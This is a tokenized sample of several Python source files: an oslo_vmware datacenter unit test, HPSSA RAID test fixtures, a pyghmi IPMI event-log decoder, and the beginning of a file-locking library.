<s> import mock <EOL> from oslo_vmware . objects import datacenter <EOL> from oslo_vmware . tests import base <EOL> class DatacenterTestCase ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_dc ( self ) : <EOL> self . assertRaises ( ValueError , datacenter . Datacenter , None , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , datacenter . Datacenter , mock . Mock ( ) , None ) <EOL> dc = datacenter . Datacenter ( '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> self . assertEqual ( '<STR_LIT>' , dc . ref ) <EOL> self . assertEqual ( '<STR_LIT:name>' , dc . name ) </s>
<s> HPSSA_NO_DRIVES = '''<STR_LIT>''' <EOL> HPSSA_ONE_DRIVE = '''<STR_LIT>''' <EOL> HPSSA_ONE_DRIVE_RAID_50 = '''<STR_LIT>''' <EOL> HPSSA_ONE_DRIVE_100GB_RAID_5 = '''<STR_LIT>''' <EOL> HPSSA_TWO_DRIVES_100GB_RAID5_50GB_RAID1 = '''<STR_LIT>''' <EOL> HPSSA_BAD_SIZE_PHYSICAL_DRIVE = '''<STR_LIT>''' <EOL> HPSSA_BAD_SIZE_LOGICAL_DRIVE = '''<STR_LIT>''' <EOL> HPSSA_SMALL_SIZE_PHYSICAL_DRIVE = '''<STR_LIT>''' <EOL> ARRAY_ACCOMODATE_LOGICAL_DISK = '''<STR_LIT>''' <EOL> ARRAY_ACCOMODATE_LOGICAL_DISK_INVALID = '''<STR_LIT>''' <EOL> HPSSA_NO_DRIVES_2_PHYSICAL_DISKS = '''<STR_LIT>''' <EOL> ONE_DRIVE_RAID_1 = '''<STR_LIT>''' <EOL> DRIVE_2_RAID_1_OKAY_TO_SHARE = '''<STR_LIT>''' <EOL> TWO_DRIVES_50GB_RAID1 = '''<STR_LIT>''' <EOL> NO_DRIVES_HPSSA_7_DISKS = '''<STR_LIT>''' <EOL> ONE_DRIVE_RAID_1_50_GB = '''<STR_LIT>''' <EOL> TWO_DRIVES_50GB_RAID1_MAXGB_RAID5 = '''<STR_LIT>''' </s>
<s> import pyghmi . constants as pygconst <EOL> import pyghmi . exceptions as pygexc <EOL> import pyghmi . ipmi . private . constants as ipmiconst <EOL> import struct <EOL> import time <EOL> psucfg_errors = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> } <EOL> firmware_progress = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> firmware_errors = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> auxlog_actions = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> } <EOL> 
restart_causes = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> slot_types = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT:10> : '<STR_LIT>' , <EOL> <NUM_LIT:11> : '<STR_LIT>' , <EOL> } <EOL> power_states = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> watchdog_boot_phases = { <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> } <EOL> version_changes = { <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : 
'<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> fru_states = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> def decode_eventdata ( sensor_type , offset , eventdata , sdr ) : <EOL> """<STR_LIT>""" <EOL> if sensor_type == <NUM_LIT:5> and offset == <NUM_LIT:4> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:1> ] ) <EOL> elif sensor_type == <NUM_LIT:8> and offset == <NUM_LIT:6> : <EOL> errtype = eventdata [ <NUM_LIT:2> ] & <NUM_LIT> <EOL> return psucfg_errors . get ( errtype , '<STR_LIT>' ) <EOL> elif sensor_type == <NUM_LIT> and offset == <NUM_LIT:8> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:2> ] ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> if offset == <NUM_LIT:0> : <EOL> return firmware_errors . get ( eventdata [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> elif offset in ( <NUM_LIT:1> , <NUM_LIT:2> ) : <EOL> return firmware_progress . get ( eventdata [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> if offset == <NUM_LIT:0> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:1> ] ) <EOL> elif offset == <NUM_LIT:1> : <EOL> return '<STR_LIT>' . format ( <EOL> eventdata [ <NUM_LIT:1> ] , eventdata [ <NUM_LIT:2> ] & <NUM_LIT> ) <EOL> elif offset == <NUM_LIT:5> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:2> ] ) <EOL> elif offset == <NUM_LIT:6> : <EOL> return '<STR_LIT>' . 
format ( eventdata [ <NUM_LIT:1> ] ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> if offset == <NUM_LIT:3> : <EOL> action = ( eventdata [ <NUM_LIT:1> ] & <NUM_LIT> ) >> <NUM_LIT:4> <EOL> return auxlog_actions . get ( action , '<STR_LIT>' ) <EOL> elif offset == <NUM_LIT:4> : <EOL> sysactions = [ ] <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> << <NUM_LIT:5> : <EOL> sysactions . append ( '<STR_LIT>' ) <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> << <NUM_LIT:4> : <EOL> sysactions . append ( '<STR_LIT>' ) <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> << <NUM_LIT:3> : <EOL> sysactions . append ( '<STR_LIT>' ) <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> << <NUM_LIT:2> : <EOL> sysactions . append ( '<STR_LIT>' ) <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> << <NUM_LIT:1> : <EOL> sysactions . append ( '<STR_LIT>' ) <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> : <EOL> sysactions . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT:U+002C>' . join ( sysactions ) <EOL> elif offset == <NUM_LIT:5> : <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> elif sensor_type == <NUM_LIT> and offset == <NUM_LIT:0> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:1> ] , eventdata [ <NUM_LIT:2> ] ) <EOL> elif sensor_type == <NUM_LIT> and offset == <NUM_LIT:7> : <EOL> return restart_causes . get ( eventdata [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> elif sensor_type == <NUM_LIT> and offset == <NUM_LIT> : <EOL> return '<STR_LIT>' . format ( slot_types . get ( eventdata [ <NUM_LIT:1> ] , '<STR_LIT>' ) , <EOL> eventdata [ <NUM_LIT:2> ] ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> phase = eventdata [ <NUM_LIT:1> ] & <NUM_LIT> <EOL> return watchdog_boot_phases . get ( phase , '<STR_LIT>' ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> if offset == <NUM_LIT:4> : <EOL> return '<STR_LIT>' . 
format ( eventdata [ <NUM_LIT:1> ] ) <EOL> elif offset == <NUM_LIT:5> : <EOL> islogical = ( eventdata [ <NUM_LIT:1> ] & <NUM_LIT> ) <EOL> if islogical : <EOL> if eventdata [ <NUM_LIT:2> ] in sdr . fru : <EOL> return sdr . fru [ eventdata [ <NUM_LIT:2> ] ] . fru_name <EOL> else : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:2> ] ) <EOL> elif sensor_type == <NUM_LIT> and offset == <NUM_LIT:3> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:1> ] ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> return version_changes . get ( eventdata [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> cause = ( eventdata [ <NUM_LIT:1> ] & <NUM_LIT> ) >> <NUM_LIT:4> <EOL> cause = fru_states . get ( cause , '<STR_LIT>' ) <EOL> oldstate = eventdata [ <NUM_LIT:1> ] & <NUM_LIT> <EOL> if oldstate != offset : <EOL> try : <EOL> cause += '<STR_LIT>' . format ( <EOL> ipmiconst . sensor_type_offsets [ <NUM_LIT> ] [ oldstate ] [ '<STR_LIT>' ] ) <EOL> except KeyError : <EOL> pass <EOL> def _fix_sel_time ( records , ipmicmd ) : <EOL> timefetched = False <EOL> rsp = None <EOL> while not timefetched : <EOL> try : <EOL> rsp = ipmicmd . xraw_command ( netfn = <NUM_LIT> , command = <NUM_LIT> ) <EOL> timefetched = True <EOL> except pygexc . IpmiException as pi : <EOL> if pi . ipmicode == <NUM_LIT> : <EOL> continue <EOL> raise <EOL> nowtime = struct . 
unpack_from ( '<STR_LIT>' , rsp [ '<STR_LIT:data>' ] ) [ <NUM_LIT:0> ] <EOL> correctednowtime = nowtime <EOL> if nowtime < <NUM_LIT> : <EOL> correctearly = True <EOL> inpreinit = True <EOL> else : <EOL> correctearly = False <EOL> inpreinit = False <EOL> newtimestamp = <NUM_LIT:0> <EOL> lasttimestamp = None <EOL> trimindexes = [ ] <EOL> for index in reversed ( xrange ( len ( records ) ) ) : <EOL> record = records [ index ] <EOL> if '<STR_LIT>' not in record or record [ '<STR_LIT>' ] == <NUM_LIT> : <EOL> continue <EOL> if ( '<STR_LIT>' in record and record [ '<STR_LIT>' ] == '<STR_LIT>' and <EOL> record [ '<STR_LIT>' ] == '<STR_LIT>' ) : <EOL> newtimestamp = record [ '<STR_LIT>' ] <EOL> trimindexes . append ( index ) <EOL> elif ( '<STR_LIT>' in record and record [ '<STR_LIT>' ] == '<STR_LIT>' and <EOL> record [ '<STR_LIT>' ] == '<STR_LIT>' ) : <EOL> if newtimestamp : <EOL> if record [ '<STR_LIT>' ] < <NUM_LIT> : <EOL> correctearly = True <EOL> nowtime = correctednowtime <EOL> correctednowtime += newtimestamp - record [ '<STR_LIT>' ] <EOL> newtimestamp = <NUM_LIT:0> <EOL> trimindexes . append ( index ) <EOL> else : <EOL> newtimestamp = <NUM_LIT:0> <EOL> if record [ '<STR_LIT>' ] < <NUM_LIT> : <EOL> if not correctearly : <EOL> correctednowtime = nowtime <EOL> continue <EOL> if ( lasttimestamp is not None and <EOL> record [ '<STR_LIT>' ] > lasttimestamp ) : <EOL> correctearly = False <EOL> correctednowtime = nowtime <EOL> continue <EOL> inpreinit = True <EOL> lasttimestamp = record [ '<STR_LIT>' ] <EOL> age = correctednowtime - record [ '<STR_LIT>' ] <EOL> record [ '<STR_LIT>' ] = time . strftime ( <EOL> '<STR_LIT>' , time . localtime ( time . time ( ) - age ) ) <EOL> else : <EOL> if inpreinit : <EOL> inpreinit = False <EOL> correctednowtime = nowtime <EOL> correctearly = False <EOL> if correctednowtime < <NUM_LIT> : <EOL> record [ '<STR_LIT>' ] = time . strftime ( <EOL> '<STR_LIT>' , time . 
localtime ( <EOL> record [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> age = correctednowtime - record [ '<STR_LIT>' ] <EOL> record [ '<STR_LIT>' ] = time . strftime ( <EOL> '<STR_LIT>' , time . localtime ( <EOL> time . time ( ) - age ) ) <EOL> for index in trimindexes : <EOL> del records [ index ] <EOL> class EventHandler ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , sdr , ipmicmd ) : <EOL> self . _sdr = sdr <EOL> self . _ipmicmd = ipmicmd <EOL> def _populate_event ( self , deassertion , event , event_data , event_type , <EOL> sensor_type , sensorid ) : <EOL> event [ '<STR_LIT>' ] = sensorid <EOL> try : <EOL> event [ '<STR_LIT>' ] = self . _sdr . sensors [ sensorid ] . name <EOL> except KeyError : <EOL> if sensorid == <NUM_LIT:0> : <EOL> event [ '<STR_LIT>' ] = None <EOL> else : <EOL> event [ '<STR_LIT>' ] = '<STR_LIT>' . format ( sensorid ) <EOL> event [ '<STR_LIT>' ] = deassertion <EOL> event [ '<STR_LIT>' ] = event_data <EOL> byte2type = ( event_data [ <NUM_LIT:0> ] & <NUM_LIT> ) >> <NUM_LIT:6> <EOL> byte3type = ( event_data [ <NUM_LIT:0> ] & <NUM_LIT> ) >> <NUM_LIT:4> <EOL> if byte2type == <NUM_LIT:1> : <EOL> event [ '<STR_LIT>' ] = event_data [ <NUM_LIT:1> ] <EOL> evtoffset = event_data [ <NUM_LIT:0> ] & <NUM_LIT> <EOL> event [ '<STR_LIT>' ] = event_type <EOL> if event_type <= <NUM_LIT> : <EOL> event [ '<STR_LIT>' ] = sensor_type <EOL> event [ '<STR_LIT>' ] = '<STR_LIT>' . format ( event_type , evtoffset ) <EOL> event [ '<STR_LIT>' ] = ipmiconst . sensor_type_codes . get ( <EOL> sensor_type , '<STR_LIT>' ) <EOL> evreading = ipmiconst . generic_type_offsets . get ( <EOL> event_type , { } ) . get ( evtoffset , { } ) <EOL> if event [ '<STR_LIT>' ] : <EOL> event [ '<STR_LIT>' ] = evreading . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> event [ '<STR_LIT>' ] = evreading . get ( <EOL> '<STR_LIT>' , pygconst . Health . Ok ) <EOL> else : <EOL> event [ '<STR_LIT>' ] = evreading . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> event [ '<STR_LIT>' ] = evreading . 
get ( <EOL> '<STR_LIT>' , pygconst . Health . Ok ) <EOL> elif event_type == <NUM_LIT> : <EOL> event [ '<STR_LIT>' ] = sensor_type <EOL> event [ '<STR_LIT>' ] = '<STR_LIT>' . format ( event_type , evtoffset ) <EOL> event [ '<STR_LIT>' ] = ipmiconst . sensor_type_codes . get ( <EOL> sensor_type , '<STR_LIT>' ) <EOL> evreading = ipmiconst . sensor_type_offsets . get ( <EOL> sensor_type , { } ) . get ( evtoffset , { } ) <EOL> if event [ '<STR_LIT>' ] : <EOL> event [ '<STR_LIT>' ] = evreading . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> event [ '<STR_LIT>' ] = evreading . get ( <EOL> '<STR_LIT>' , pygconst . Health . Ok ) <EOL> else : <EOL> event [ '<STR_LIT>' ] = evreading . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> event [ '<STR_LIT>' ] = evreading . get ( <EOL> '<STR_LIT>' , pygconst . Health . Ok ) <EOL> if event_type == <NUM_LIT:1> : <EOL> if byte3type == <NUM_LIT:1> : <EOL> event [ '<STR_LIT>' ] = event_data [ <NUM_LIT:2> ] <EOL> if <NUM_LIT:3> in ( byte2type , byte3type ) or event_type == <NUM_LIT> : <EOL> additionaldata = decode_eventdata ( <EOL> sensor_type , evtoffset , event_data , self . _sdr ) <EOL> if additionaldata : <EOL> event [ '<STR_LIT>' ] = additionaldata <EOL> def decode_pet ( self , specifictrap , petdata ) : <EOL> if isinstance ( specifictrap , int ) : <EOL> specifictrap = struct . unpack ( '<STR_LIT>' , struct . pack ( '<STR_LIT>' , specifictrap ) ) <EOL> if len ( specifictrap ) != <NUM_LIT:4> : <EOL> raise pygexc . InvalidParameterValue ( <EOL> '<STR_LIT>' ) <EOL> specifictrap = bytearray ( specifictrap ) <EOL> sensor_type = specifictrap [ <NUM_LIT:1> ] <EOL> event_type = specifictrap [ <NUM_LIT:2> ] <EOL> deassertion = ( specifictrap [ <NUM_LIT:3> ] & <NUM_LIT> ) == <NUM_LIT> <EOL> sensorid = petdata [ <NUM_LIT> ] <EOL> event_data = petdata [ <NUM_LIT> : <NUM_LIT> ] <EOL> event = { } <EOL> seqnum = struct . unpack_from ( '<STR_LIT>' , buffer ( petdata [ <NUM_LIT:16> : <NUM_LIT> ] ) ) [ <NUM_LIT:0> ] <EOL> ltimestamp = struct . 
unpack_from ( '<STR_LIT>' , buffer ( petdata [ <NUM_LIT> : <NUM_LIT> ] ) ) [ <NUM_LIT:0> ] <EOL> petack = bytearray ( struct . pack ( '<STR_LIT>' , seqnum , ltimestamp , <EOL> petdata [ <NUM_LIT> ] , petdata [ <NUM_LIT> ] , sensorid , <EOL> * event_data ) ) <EOL> try : <EOL> self . _ipmicmd . xraw_command ( netfn = <NUM_LIT:4> , command = <NUM_LIT> , data = petack ) <EOL> except pygexc . IpmiException : <EOL> pass <EOL> self . _populate_event ( deassertion , event , event_data , event_type , <EOL> sensor_type , sensorid ) <EOL> event [ '<STR_LIT>' ] = ltimestamp <EOL> _fix_sel_time ( ( event , ) , self . _ipmicmd ) <EOL> return event <EOL> def _decode_standard_event ( self , eventdata , event ) : <EOL> if eventdata [ <NUM_LIT:2> ] not in ( <NUM_LIT:3> , <NUM_LIT:4> ) : <EOL> raise pygexc . PyghmiException ( <EOL> '<STR_LIT>' . format ( eventdata [ <NUM_LIT:2> ] ) ) <EOL> sensor_type = eventdata [ <NUM_LIT:3> ] <EOL> sensorid = eventdata [ <NUM_LIT:4> ] <EOL> event_data = eventdata [ <NUM_LIT:6> : ] <EOL> deassertion = ( eventdata [ <NUM_LIT:5> ] & <NUM_LIT> == <NUM_LIT> ) <EOL> event_type = eventdata [ <NUM_LIT:5> ] & <NUM_LIT> <EOL> self . _populate_event ( deassertion , event , event_data , event_type , <EOL> sensor_type , sensorid ) <EOL> def _sel_decode ( self , origselentry ) : <EOL> selentry = bytearray ( origselentry ) <EOL> event = { } <EOL> event [ '<STR_LIT>' ] = struct . unpack_from ( '<STR_LIT>' , origselentry [ : <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] <EOL> if selentry [ <NUM_LIT:2> ] == <NUM_LIT:2> or ( <NUM_LIT> <= selentry [ <NUM_LIT:2> ] <= <NUM_LIT> ) : <EOL> event [ '<STR_LIT>' ] = struct . unpack_from ( '<STR_LIT>' , buffer ( selentry [ <NUM_LIT:3> : <NUM_LIT:7> ] ) <EOL> ) [ <NUM_LIT:0> ] <EOL> if selentry [ <NUM_LIT:2> ] == <NUM_LIT:2> : <EOL> self . 
_decode_standard_event ( selentry [ <NUM_LIT:7> : ] , event ) <EOL> elif <NUM_LIT> <= selentry [ <NUM_LIT:2> ] <= <NUM_LIT> : <EOL> event [ '<STR_LIT>' ] = selentry [ <NUM_LIT:7> : <NUM_LIT:10> ] <EOL> event [ '<STR_LIT>' ] = selentry [ <NUM_LIT:10> : ] <EOL> elif selentry [ <NUM_LIT:2> ] >= <NUM_LIT> : <EOL> event [ '<STR_LIT>' ] = selentry [ <NUM_LIT:3> : ] <EOL> self . _ipmicmd . _oem . process_event ( event , self . _ipmicmd , selentry ) <EOL> if '<STR_LIT>' in event : <EOL> del event [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in event : <EOL> del event [ '<STR_LIT>' ] <EOL> return event <EOL> def _fetch_entries ( self , ipmicmd , startat , targetlist , rsvid = <NUM_LIT:0> ) : <EOL> curr = startat <EOL> endat = curr <EOL> while curr != <NUM_LIT> : <EOL> endat = curr <EOL> reqdata = bytearray ( struct . pack ( '<STR_LIT>' , rsvid , curr , <NUM_LIT> ) ) <EOL> try : <EOL> rsp = ipmicmd . xraw_command ( <EOL> netfn = <NUM_LIT> , command = <NUM_LIT> , data = reqdata ) <EOL> except pygexc . IpmiException as pi : <EOL> if pi . ipmicode == <NUM_LIT> : <EOL> break <EOL> curr = struct . unpack_from ( '<STR_LIT>' , buffer ( rsp [ '<STR_LIT:data>' ] [ : <NUM_LIT:2> ] ) ) [ <NUM_LIT:0> ] <EOL> targetlist . append ( self . _sel_decode ( rsp [ '<STR_LIT:data>' ] [ <NUM_LIT:2> : ] ) ) <EOL> return endat <EOL> def fetch_sel ( self , ipmicmd , clear = False ) : <EOL> """<STR_LIT>""" <EOL> records = [ ] <EOL> endat = self . _fetch_entries ( ipmicmd , <NUM_LIT:0> , records ) <EOL> if clear and records : <EOL> rsp = ipmicmd . xraw_command ( netfn = <NUM_LIT> , command = <NUM_LIT> ) <EOL> rsvid = struct . unpack_from ( '<STR_LIT>' , rsp [ '<STR_LIT:data>' ] ) [ <NUM_LIT:0> ] <EOL> del records [ - <NUM_LIT:1> ] <EOL> self . _fetch_entries ( ipmicmd , endat , records , rsvid ) <EOL> clrdata = bytearray ( struct . pack ( '<STR_LIT>' , rsvid , <NUM_LIT> ) ) <EOL> ipmicmd . 
xraw_command ( netfn = <NUM_LIT> , command = <NUM_LIT> , data = clrdata ) <EOL> _fix_sel_time ( records , ipmicmd ) <EOL> return records </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import functools <EOL> import os <EOL> import socket <EOL> import threading <EOL> import warnings <EOL> if not hasattr ( threading , "<STR_LIT>" ) : <EOL> threading . current_thread = threading . currentThread <EOL> if not hasattr ( threading . Thread , "<STR_LIT>" ) : <EOL> threading . Thread . get_name = threading . Thread . getName <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class LockError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class LockTimeout ( LockError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AlreadyLocked ( LockError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class LockFailed ( LockError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnlockError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class NotLocked ( UnlockError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class NotMyLock ( UnlockError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class _SharedBase ( object ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> def acquire ( self , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented ( "<STR_LIT>" ) <EOL> def release ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented ( "<STR_LIT>" ) <EOL> def __enter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . acquire ( ) <EOL> return self <EOL> def __exit__ ( self , * _exc ) : <EOL> """<STR_LIT>""" <EOL> self . release ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , self . path ) <EOL> class LockBase ( _SharedBase ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , path , threaded = True , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> super ( LockBase , self ) . 
__init__ ( path ) <EOL> self . lock_file = os . path . abspath ( path ) + "<STR_LIT>" <EOL> self . hostname = socket . gethostname ( ) <EOL> self . pid = os . getpid ( ) <EOL> if threaded : <EOL> t = threading . current_thread ( ) <EOL> ident = getattr ( t , "<STR_LIT>" , hash ( t ) ) <EOL> self . tname = "<STR_LIT>" % ( ident & <NUM_LIT> ) <EOL> else : <EOL> self . tname = "<STR_LIT>" <EOL> dirname = os . path . dirname ( self . lock_file ) <EOL> self . unique_name = os . path . join ( dirname , <EOL> "<STR_LIT>" % ( self . hostname , <EOL> self . tname , <EOL> self . pid , <EOL> hash ( self . path ) ) ) <EOL> self . timeout = timeout <EOL> def is_locked ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented ( "<STR_LIT>" ) <EOL> def i_am_locking ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented ( "<STR_LIT>" ) <EOL> def break_lock ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented ( 